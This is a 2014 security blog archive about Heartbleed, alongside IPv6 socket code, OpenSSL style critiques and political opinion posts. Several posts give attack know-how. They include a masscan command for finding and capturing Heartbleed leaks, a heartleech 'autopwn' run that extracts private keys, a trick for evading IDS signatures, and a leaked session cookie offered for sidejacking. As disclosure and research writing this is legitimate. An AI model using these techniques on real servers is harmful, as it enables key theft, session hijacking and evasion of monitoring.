Wednesday, April 30, 2014

Transparent IPv6 in socket APIs

In the screenshot attached to this post, I'm running my 'heartleech' program against Google's servers. Notice how it's connecting to the servers with IPv6. However, I didn't really do anything special to explicitly support IPv6. The latest Sockets API can transparently support both IPv4 and IPv6, on Win/Mac/Unix, without doing extra work.

The solution starts with the "getaddrinfo()" function, which replaces the older "gethostbyname()". This queries the DNS server, and if the server supports it, returns all the records in response, whether they be A (IPv4) or AAAA (IPv6) records.

By default, Heartleech just choose the first response record, which in this case is IPv6. It next calls the "socket()" function to create a socket. However, instead of choosing the address family explicitly (AF_INET or AF_INET6), it picks it from the returned address above. Likewise, when it calls "connect()", it again uses this same structure.

Thus, the code looks like:

    getaddrinfo(hostname, port, 0, &addr);
    fd = socket(addr->ai_family, SOCK_STREAM, 0);
    connect(fd, addr->ai_addr, addr->ai_addrlen);

You see how this works in the above screenshot. Heartleech calls "getaddrinfo()" and the debug messages list all the IP addresses in response. It picks whichever is the first response  and initiates the TCP connection. Sometimes this is IPv4 and sometimes it's IPv6 (as in the above example).

This would work splendidly expect for when it comes time to print the address in debug messages. The old IPv4-only functions were "inet_addr()" to parse the address, and "inet_ntoa()" to print it. The new functions are "inet_pton()" and "inet_ntop()" respectively. They don't act on the "sockaddr" address structure as the above functions do. Instead, they act on the raw addresses themselves. In other words, I have to call the functions differently depending upon whether they are IPv6 or IPv4, which is a bit annoying.

A further complication is WinXP. I know you want to ignore it, but it's something we'll have to live with for the next several years. It supports the 'getaddrinfo()' function, but not "inet_ntop()" functions. Therefore, I have to wrap this in the code.

Finally, sometimes you to manually select either IPv4 or IPv6, regardless of what getaddrinfo() returns first.

And that's it. If you search the 'heartleech.c' file for AF_INET6, the above list is everything I had to do in order to get IPv6 working. That includes a large list of non-trivial functionality. The program can go through a Socks5 proxy, negotiate the use of SSL using the STARTTLS protocol, complete the SSL handshake, and then send application-layer commands. All of this works with a minimal fuss over IPv6.











Monday, April 28, 2014

Fun with IDS funtime #3: heartbleed

I don't like the EmergingThreat rules, not so much because of the rules themselves but because of the mentality of the people who use them. I scan the entire Internet. When I get clueless abuse complaints, such as "stop scanning me but I won't tell you my IP address", they usually come from people using the EmergingThreat rules. This encourages me to evade those rules.

The latest example is the Heartbleed attack. Rules that detect the exploit trigger on the pattern |18 03| being the first bytes of TCP packet payload. However, TCP is a streaming protocol: patterns can therefore appear anywhere in the payload, not just the first two bytes.

I therefore changed  masscan to push that pattern deeper into the payload, and re-scanned the Internet. Sure enough, not a single user of EmergingThreats complained. The only complaints from IDS users were from IBM sensors with the "TLS_Heartbeat_Short_Request" signature, and from some other unknown IDS with a signature name of "Heartbleed_Scan".

That the rules can so easily be evaded is an important consideration. Recently, the FBI and ICS-CERT published advisories, recommending IDS signatures to detect exploits of the bug. None of their recommended signatures can detect masscan. I doubt these organizations have the competency to understand why, so I thought I'd explain it in simple terms.

Thursday, April 24, 2014

Clapper muzzles supporters not critics

Recently, the director of national intelligence promulgated a rule barring members of the intelligence community from talking with the press -- even on unclassified matters. This has widely been described as yet another way that they are silencing critics and potential whistleblowers. That may be true, but the intent is the opposite: they want to silence defenders/supporters of the intelligence community.

During the last Winter Olympics, journalists arriving in Sochi reported how basic services like plumbing were broken. A Russian spokesman claimed the journalists were lying, that they had video proof that journalists were leaving the showers running all day long. This led to the natural follow up question: why does Russia have video cameras in showers?

In any crisis, those who would defend you are often your worst enemy. True Believers lie and otherwise behave badly. That's great when the other side does it (e.g. the Glenn Greenwald crowd that distorts the Snowden disclosures), but it hurts you when your own side does it. Thus, it's the first step of crisis management for corporations and governments: make your own supporters shut up.

Am I arguing that James Clapper is therefore not as corrupt as people claim? No, quite the opposite. He's more corrupt.

The intelligence community serves at the whim of the President, who serves at the whim of the people. It's not their job to influence policy, by lobbying congress or the people. It's their job to cary out policy.

What we see here is that they are trying to control the message -- meaning "influence policy". That's horrible and dangerous, and justifies the worst claims that the Greenwald crowd makes about the intelligence community, that they are looking out for their own interests rather than our interests.

A free and open debate about the intelligence community will harm the interests of the intelligence community. That sucks for them, but screw them. They have no interests but to serve our interests. If we want programs dismantled, and if that allows terrorist attacks, then so be it. It's a choice that we, the informed public, make -- it's not a choice made for us by the intelligence community.

No, Glenn Greenwald did not win a Pulitzer

While the NSA is wrong, its critics are worse. Activists care less about the truth than the NSA.

An example of this is how activists claim Glenn Greenwald is a Pulitzer Prize Winner. He isn't. It's the Guardian newspaper that won the prize, not Greenwald.

The following is my email exchange with the Pulitzer organization, not that truth will convince activists:

Received: from dyn-128-59-99-157.dyn.columbia.edu
 (dyn-128-59-99-157.dyn.columbia.edu [128.59.99.157]) by
 cubmail.cc.columbia.edu (Horde MIME library) with HTTP; Thu, 24 Apr 2014
 10:50:47 -0400
Date: Thu, 24 Apr 2014 10:50:47 -0400
From: <pulitzer@pulitzer.org>
To: Robert Graham 
Subject: Re: Prize for Community Service

Dear Mr. Graham:

Both The Washington Post and The Guardian US were awarded 2014  
Pulitzer Prizes in Public Service. The Public Service prize is always  
awarded to the newspaper and not the individual. Please see our list  
of past Public Service winners here:  
http://www.pulitzer.org/bycat/Public-Service

Sincerely,
Claudia Weissberg
Website Manager
The Pulitzer Prizes

Quoting Robert Graham :

> Hello.
>
> I wholeheartedly agree with your choice for "Community Service", but I
> don't understand it. The prize honors the newspapers, but does that
> mean the journalists like Glenn Greenwald or the leaker Edward Snowden
> can likewise claim credit? In other words, is it accurate to call
> Greenwald a Pulitzer Prize Winner?
>
> Thank you for clearing this up,
> Robert Graham
>
>

Tuesday, April 22, 2014

Heartbleed: Pointer-arithmetic considered harmful

Heartbleed has encouraged people to look at the OpenSSL source code. Many have called it "spaghetti code" -- tangled, fragile, and hard to maintain. While this characterization is accurate, it's unfair. OpenSSL is written according to standard programming practices. It's those practices which are at fault. If you get new engineers to rewrite the code, they'll follow the same practices, and end up with equally tangled code.

Coding practices are out of date, laughably so. If you learn how to program in C in a university today, your textbook and your professor will teach you how to write code as if it were 1984 and not 2014. They will teach you to use "strcpy()", a function prone to buffer-overflows that is widely banned in modern projects. There are fifty other issues with C that are just as important.

In this post, I'm going to focus on one of those out-of-date practices called "pointer-arithmetic". It's a feature unique to C. No other language allows it -- for good reason. Pointer-arithmetic leads to unstable, hard-to-maintain code.

In normal languages, if you want to enumerate all the elements in an array, you'd do so with with an expression like the following:

     p[i++]

The above code works in a wide variety of programming languages. It works in C, too, and indeed, most languages got it by copying C syntax. However, in C, you may optionally use a different expression:

    *p++

This is pointer-arithmetic. Instead of a fixed pointer and a variable index, the pointer is variable, moving through the array.

To demonstrate how this gets you into trouble, I present the following bit of code from "openssl/ssl/s3_srvr.c":

   {
s2n(strlen(s->ctx->psk_identity_hint), p);
strncpy((char *)p, s->ctx->psk_identity_hint, strlen(s->ctx->psk_identity_hint));
p+=strlen(s->ctx->psk_identity_hint);
}

The first thing to notice is the line I've highlighted. This line contains the old programming joke:

    strncpy(dst,src,strlen(src));

The purpose of strncpy() is to guard against buffer-overflows by double-checking the size of the destination. The joke version double-checks the size of the source -- defeating the purpose, causing the same buffer-overflow as if the programmer had just used the original strcpy() in the first place.

This is a funny bit of code, but it turns out it's not stupid. In C, text strings are nul terminated, meaning that a byte with the value of 0 is added to the end of every string. The intent of the code above is to prevent the nul termination, not to prevent buffer-overflows. In other words, the true intent of the programmer can be expressed changing the above function from "strncpy()" to "memcpy()".

The reason the programmer wants to avoid nul termination is because they are building a protocol buffer where the string will be prefixed by a length. That's the effect of the macro "s2n()" in the first line of code, which inserts a 2 byte length field and invisibly moves the pointer 'p' forward two bytes. (By the way, macros that invisible alter variables are likewise bad programming practice).

The correct fix for the above code is to change from a pointer-arithmetic paradigm to an integer-indexed paradigm. The code would look like the following:

append_short(p, &offset, max, strlen(s->ctx->psk_identity_hint));
append_string(p, &offset, max, s->ctx->psk_identity_hint);

The value 'p' remains fixed, we increment the "offset" as we append fields, and we track the maximum size of the buffer with the variable "max". This both untangles the code and also makes it inherently safe, preventing buffer-overflows.

Last year, college professor John Regehr had a little contest to write a simple function to parse integers. Most solutions to the contest used the pointer-arithmetic approach, only a few (like my solution) used the integer-index paradigm. I urge you to click on those links and compare other solutions to mine.

My solution, using integer indexes

Typical other solution, using pointer-arithmetic


Many justify pointer-arithmetic claiming it's faster. This isn't really true. In the above contest, my solution was one of the fastest solutions. Indeed, I'm famous for the fact that my code is usually an order of magnitude faster than other people's code. Sure, you can show with some micro-benchmarks that pointer-arithmetic is faster in some cases, but that difference rarely matters. The simplest rule is to never use it -- and if you ever do, write a big comment block explaining why you are doing something so ugly, and include the benchmarks proving it's faster.

Others justify pointer-arithmetic out of language bigotry. We are taught to look down at people who try to program in one language as if it were another language. If you program in C the way you'd program in Java, then (according to this theory) you should just stick with Java. That my snippet of code above works equally well in Java and C is considered a bad thing.

This bigotry is wrong. Yes, when a language gives you desirable constructs, you should use them. But pointer-arithmetic isn't desirable. We use C not because it's a good language, but because it's low-level and the lingua franca of libraries. We can write a library in C for use with Java, but not the reverse. We use C because we have to. We shouldn't be programming in the C paradigm -- we should be adopting the paradigms of other languages. For example, C should be "object oriented", where complex structures have clear constructors, destructors, and accessor member functions. C is hostile to that paradigm of programming -- but it's still the right way to program.


Pointer-arithmetic is just one of many issues effecting the OpenSSL source-base. I point it out here because of the lulz of the strncpy() function. Perhaps in later posts I'll describe some of it's other flaws.



Update: Another good style is "functional" programming, where functions avoid "side effects". Again, C is hostile to the idea, but when coder's can avoid side-effects, they should.

Friday, April 18, 2014

xkcd is wrong about "free speech"

The usually awesome XKCD cartoon opines that "the right to free speech means only that the government cannot arrest you for what you say". It is profoundly wrong. The cartoon only applies to "First Amendment Rights", where confused people think the government protects their Twitter posts. But it doesn't apply to censorship and other threats against people freely speaking.

The First Amendment doesn't apply to private companies. It says that "Congress shall pass no law abridging freedom of speech". This wording is important. It doesn't say that congress shall pass laws protecting our speech, but that congress shall not abridge it. "Free speech" is not a right given to us by government. Instead, "free speech" is a right we have, regardless of government.

In other words, if Twitter wants to restrict what you tweet, government can't stop them. If Facebook wants to censors what you post, Congress can't get involved.

But free speech isn't always about government. The forces that want to restrict your speech include private actors. For example, cartoonists around the world draw pictures of Jesus and Buddha, but do not draw pictures of Mohamed, because they are afraid of being murdered by Islamic fundamentalists. South Park depicted Jesus as addicted to Internet porn, and Buddha with a cocaine habit, but the censors forced them to cover up a totally innocuous picture of Mohamed. It's a free-speech issue, but not one that involves government.

In oppressive countries like Russia, the threats to speech rarely come directly from the government. It's not the police arresting people for speech. Instead, it's the local young thugs beating up journalists, with the police looking the other way.

In the United States, society has gone overboard on "political correctness" that silences speech. A good example in cybersec community is when the "Ada Initiative" got that talk canceled at "BSidesSF" last year, for obscure reasons that come down to the Ada Initiative hating that speech. That sort of thing is very much a "free speech" issue, even though the official government wasn't involved. Any time those in a position of power restrict speech, purely for its political content, this impinges on our values of "free speech".

The "responsible-disclosure" debate is about "free-speech", where some try to use the hammer of "ethical behavior" to control speech. Last night I tweeted a line of code from the OpenSSL source code that demonstrates a hilariously funny bug. I was attacked for my speech from OpenSSL defenders who want me to quietly submit bug patches rather than making OpenSSL look bad on Twitter.

That's why so many of us oppose the idea of "responsible-disclosure" -- the principle of "free-speech" means "free-disclosure". If you've found a vulnerability, keep it secret, sell it, notify the vendor, notify the press, do whatever the heck you want to do with it. Only "free-disclosure" advances security -- "responsible" disclosure that tries to control the process holds back security.

Such debates do circle back to government. For example, in the Andrew 'weev' Auernheimer case, the government cited Andrew's behavior (notifying the press) as an example of irresponsible behavior, because it didn't fit within the white-hat security norms of "responsible-disclosure". Andrew was sent to jail for speech that embarrassed the powerful -- and it was your anti-free-speech arguments of "responsible-disclosure" that helped put him there.


Certainly, it's technically inaccurate to cite "First Amendment" rights universally, as that's only a restriction on government. But the "free speech" is distinct: you can certainly cite your "right to free speech" in cases that have nothing to do with government.


Update: I shoulda just started this post by citing the Wikipedia entry on rights: "Rights are legal, social, or ethical principles of freedom". In other words, it's perfectly valid to use the word "right" in contexts other than "legal".

Update: I mention South Park because the XKCD mentions "when your show gets canceled". If your show gets canceled because nobody watches it, then that's certainly not a free-speech issue. But, when your show gets canceled because of threats from Islamists, then it certainly is a free-speech issue.

Monday, April 14, 2014

Heartbleed: I'm thinking BIGNUM

On Friday night, I started up my 'heartleech' program slurping down data from www.cloudflarechallenge.com at 30-mbps, then went to bed. The next day, I had over 100-gigabytes of data, but I couldn't find the private key. What was the bug in my code that prevented me from finding it? I spent two days trying to solve this problem, it was very frustrating.

The answer was "byte-order". I was looking for the prime factor in the same way that it'd appear in a DER0-encoded file, which is "big-endian". Instead, the way to look for the key is in little-endian format.

I've misread the OpenSSL code before, but my feeling is that this comes from the "BIGNUM" representation in OpenSSL. RSA key and it's constituent factors are all just integers that are thousands of bits long. Because they don't fit in normal 64-bit integers, they require a special library to manipulate them. The big-endian byte arrays are extracted from the private key file, then converted into the internal representation, at which point you can call functions to add, subtract, multiply, and so on.

The internal representation for OpenSSL is as a series of integers, with low-order integers first. Since the integers on Intel x86 are also little-endian, this means that the internal representation is just byte-swapped from the external form. This would not be the case on something like Solaris SPARC, which has big-endian integers. OpenSSL still stores the array of integers least-significant first, but each integer itself will be big-endian.

My guess is that the reason we can find the prime factors is that there is some BIGNUM memory sitting around that shouldn't be.

What's really annoying is that I started down this BIGNUM path, but then some other people won the www.cloudeflarechallenge.com using Python scripts. I therefore made the assumption that Python used an external big-endian form, so I chose that instead. I then tested my code and successfully found the prime factors when reading from DER encoded private key files. So I knew my code was correct. But then my code didn't find the prime factors in the data I dumped from CloudFlare. Moreover, I couldn't test their Python scripts, because the files I created from the dumps were 13-gigs in size. Their scripts would first read in the entire file before parsing it -- and would barf at 13-gigs. I have some small 400-meg files -- but none of them contain the key. Sigh.



CloudFlare Challenge writeup

Last week, I made an embarrassing mistake. I misread the OpenSSL code and claimed getting the private-key would be unlikely. This was wrong on so many levels.

Well, today I'm demonstrating the opposite, that anybody can easily get a private-key. Just run my "heartleech" program with the "-a" (autopwn) against a server, go away from your computer for many hours, and when you come back, you'll have the key.

CloudFlare has been nice enough to put up an unpatched server, challenging people to get it's key. This is easy with the autopwn feature of heartleech, as shown in this screenshot.


Friday, April 11, 2014

No, the NSA didn't make us less secure (heartbleed)

According to a Bloomberg story, the NSA has known about the #heartbleed bug from the moment it was written, presumably because they analyze commits to security packages looking for such bugs. Many have opined that this makes us less safe.

It doesn't. The NSA didn't create the hole. They didn't hinder any other researcher from finding it. If the NSA wasn't looking for the bug, the outcome would be the same.

Finding such bugs and keeping them quiet is wholly within the NSA's mission statement. Their job is to spy on foreigners and keep state secrets safe. Generally, state secrets aren't on machines exposed to the Internet, so keeping the bug secret had no impact on that.

Many think the NSA should do a different job than commanded by the President. That's called "treason". That the NSA, CIA, and the military do exactly what they are told is what distinguishes them from other agencies. Former military head Robert Gates pointed that out in his recent memoir: the reason Presidents like Obama love the military and intelligence agencies is that they are the only groups who do what they are told. There are many problems with the NSA, but that they stay on mission isn't one of them.

Maybe we should have a government agency dedicated to critical cyber infrastructure protection, whose job it would be to find and fix such bugs. Maybe we ought to have a government agency that looks at every commit to the OpenSSL source code, notifying the developers of any problems they find. In theory, the DHS already does that, but of course they are hapless with regards to cybersecurity.

There are reasons to be critical of the NSA. They pay for vulnerabilities, raising the market price of bounties responsible companies like Google have to pay. They hire away talent to look for vulnerabilities, leaving fewer talented people outside the NSA. So in that way, they make everyone else less safe. But the same thing happens elsewhere. After the worms of around 2003, Microsoft hired more than half the talented researchers in the industry, either directly or through consultants, which had the effect of making everyone else less secure. Today, Google and Apple employ lots of talented researchers. The distortions that the NSA causes in the market is less than private enterprise.

The reason to hate the NSA is not because they are following their mission, it's because their mission has creeped to include surveilling American citizens. We need to stop making them the bogyman in every story and focus on the real reasons to hate them.


Weev freed (for now)

The court has overturned the Weev conviction, but on the question of venue not the vague language of the CFAA. This is actually just as important. I discuss the "Venue Question" in this blog post about the appeal. Orin Kerr has his description here.

If we are lucky, Weev'll get retried in California, where the hack occurred, and we'll get the crazy Judge Kozinski to rule on the vagueness of the CFAA.

Wednesday, April 09, 2014

No, we weren't scanning for hearbleed before April 7

This webpage claims that people were scanning for #heartbleed before the April 7 disclosure of the bug. I doubt it. It was probably just masscan.

The trick with masscan, which makes it different from all other scanners, is that it has a custom TCP/IP stack and a custom SSL stack. When it scans a machine for SSL, it abruptly terminates the connection in the middle of the handshake. This causes no problems, but it's unusual, so servers log it.

The #heartbleed scanners have even less SSL. They just dump raw bytes on the wire and pattern-match the result. They, too, abruptly terminate the connection in the middle of handshaking, causing the same server log messages.

Masscan is really good at doing SSL surveys of the entire Internet, and a lot of people have been using it for that. The tool is only 6 months old, so it's something new in your logs. Two new things producing the same error messages might seem like the two are correlated, but of course, they aren't.


Why heartbleed doesn't leak the private key [retracted]

I got this completely wrong!

So as it turns out, I completely messed up reading the code. I don't see how, but I read it one way. I can still visualize the code in my mind's eye that I thought I read -- but it's not the real code. I thought it worked one way, but it works another way.

Private keys are still not so likely to be exposed, but still much more likely than my original analysis suggested.

600,000 servers vulnerable to heartbleed

Just an update on "HeartBleed". Yesterday I updated my "masscan" program to scan for it, and last night we scanned the Internet. We found 28,581,134 machines (28-million) that responded with a valid SSL connection. Of those, only 615,268 (600-thousand) were vulnerable to the HeartBleed bug. We also found 330,531 (300-thousand) machines that had heartbeats enabled, but which did not respond to the heartbleed attack. Presumably, this means a third of machines had been patched by the time we ran the scan last night.

Update: Some people have described this as "only 2% vulnerable". That's an unfair way of describing it. We scanned IP addresses. There are millions of IP addresses where port 443 traffic is redirected to a single load balancer. This throws off our counts.

Yes, you might have to change some passwords (#heartbleed)

There is some debate over whether this "HeartBleed" bug means you have to change your password. It might.

The HeartBleed bug grabs some random bits of memory. If a hacker wrote a script that would repeatedly query "login.yahoo.com" a thousand times per second, they'd probably get a hundred usernames/passwords per second.

Usernames and passwords go in HTTP requests just like cookies and URLs. If one is exposed, then so is the other. As I posted yesterday, here is a picture of grabbing part of a session cookie from a real website (Flickr, one of Yahoo's properties):


Luckily, sessions remain open for weeks, but the bug was only open for a couple of days. The only passwords you need to change would be ones that you entered in the last couple of days. Personally, I haven't entered any passwords over the last couple days, so I don't need to change any passwords.

At most, since hackers could have stolen the session cookies, you might want to log out and relogin to sessions on vulnerable servers.



From this article:
"I would change every password everywhere because it's possible something was sniffed out," said Wolfgang Kandek, chief technology officer for Qualys
This is nonsense. If you didn't type in your password over the last few days, then you are likely safe. I've got hundreds of accounts, I'm changing none of them, because I didn't have to relogin over the last few days. I had persistent sessions.

Tuesday, April 08, 2014

Using masscan to scan for heartbleed vulnerability

I've updated my port scanner, "masscan", to specifically look for Neel Mehta's "HeartBleed" vulnerability. Masscan is good for scanning very large networks (like the network).

Remember that the trick with masscan is that it has its own TCP/IP stack. This means that on Linux and Mac OS X (but not Windows), the operating system will send back RST packets in acknowledgement to a SYN-ACK. Therefore, on Linux, you have to either configure firewall rules to block out a range of ports that masscan can use without generating resets, or better yet, just set masscan to "spoof" an otherwise unused IP address on the local network.

Here is how you might use it:

masscan 10.0.0.0/8 -p443 -S 10.1.2.53 --rate 100000 --heartbleed

This translates to:

  • 10.0.0.0/8 = the network you want to scan, which is all 10.x.x.x
  • -p443 = the port(s) you want to scan, in this case, the ones assigned to SSL
  • -S 10.1.2.53 = an otherwise unused local IP address to scan from
  • --rate 100000 = 100-packets/second, which scans the entire Class A range in a few minutes
  • --heartbleed = the new option that reconfigures masscan to look for this vulnerability


The output on the command-line will look like the following:

Discovered open port 443/tcp on 10.20.30.143
Banner on port 443/tcp on 10.20.30.143: [ssl] cipher:0xc014
Banner on port 443/tcp on 10.20.30.143: [vuln] SSL[heartbeat] SSL[HEARTBLEED]

There are three pieces of output for each IP address. The first is that the open port exists (the scanner received a SYN-ACK). The second is that the SSL exists, that the scanner was able to get back a reasonable SSL result (reporting which cipher suite it's using). The third line is the "vulnerability" information the scanner found. In this case, it's found two separate vulnerabilities. The first is that SSL "heartbeats" are enabled, which really isn't a vulnerability, but something some people might want to remove from their network. The second is the important part, notifying you that that the "HEARTBLEED" vulnerability exists (in all caps, 'cause it's important).

Some researchers would like to capture the bled (disclosed) information. To do that, add the option "--capture heartbleed" to the command-line. This will add a fourth line of output per IP address:

Banner on port 443/tcp on 10.20.30.143: [heartbleed] AwJTQ1uQnZtyC7wMvCuSqEiXz705BMwWCoUDkJ93BDPU...

This line will be BASE64 encoded, and be many kilobytes in size (I think masscan truncates it to the first 4k).




What the heartbleed bug looks like on the wire

The "heartbleed" bug appears to grab "uninitialized memory". For typical web servers using OpenSSL, that likely means memory dealing with recent web requests. In the attached screen shot, we ran a test tool against Flickr (which is still vulnerable). Notice that it gives us a person's session cookie (which I've cropped here to avoid harming the innocent). By copying this cookie into a browser ("sidejacking") we can in theory gain temporary access to this person's account.

A picture of the packets sent to test/exploit the HeartBleed bug.
At the bottom, you see part of a person's session cookie.
I think for any particular connection, the chance of getting a "private key" is very low. But of course, if it's only a 1-in-a-million chance, then it's still too high, as attackers can create millions of connections to a server. Also, the impact for a large hosting site like Flickr would be huge, impacting hundreds of millions of connections. In other words, if "risk = likelihood * impact", then the risk of a private-key disclosure is the same as the risk of a cookie disclosure: the impact of disclosing the private-key effects all hundred million customers with a one-in-a-million likelihood, whereas the impact of a session key disclosure effects only one customer, with a greater than 50% chance per coonection.




Tuesday, April 01, 2014

New Service Offering from Errata Security: SATAN-as-A-Service

We have been collecting data on security breaches, vulnerabilities, and attitudes towards security. One conclusion we derived from analyzing this data is there were far less security problems, that we knew of, in 1995 than today. What is so different about today that 1995? One major difference is SATAN is not as widely used. The controversial security tool by notable cyber cafe attendees Dan Farmer and Wietse Venema.

We decided to take action:

Today we are announcing Satan-as-A-Service.


SATAN running on a deployable image of Kali Linux:




We are staying faithful to the original vision of SATAN. Ou first action will be to finish this TODO list:
TODO list for future (SATAN version 1.1, 2.0, whatever)
----------------------------------------------------------
o       Enable SATAN to fork and run several scans in parallel
o       Talk about sending mail/syslog to each host scanned
o       Look at and deal with subnet masks properly...
o       Put in a DNS walker
o       fix rex client strategy (rex client is currently not being used)
o       get a more complete list of banners from vendors and Internet
       on what is vulnerable and not, for the rules/* files.
o       many more bug tests, etc.
o       Add AFS testing support; currently there is none
o       Add SNMP testing/probing
And most importantly:
o       MAPS!  Big graphical maps that can *show* the relationships
       and are clickable to let users zoom into things, etc...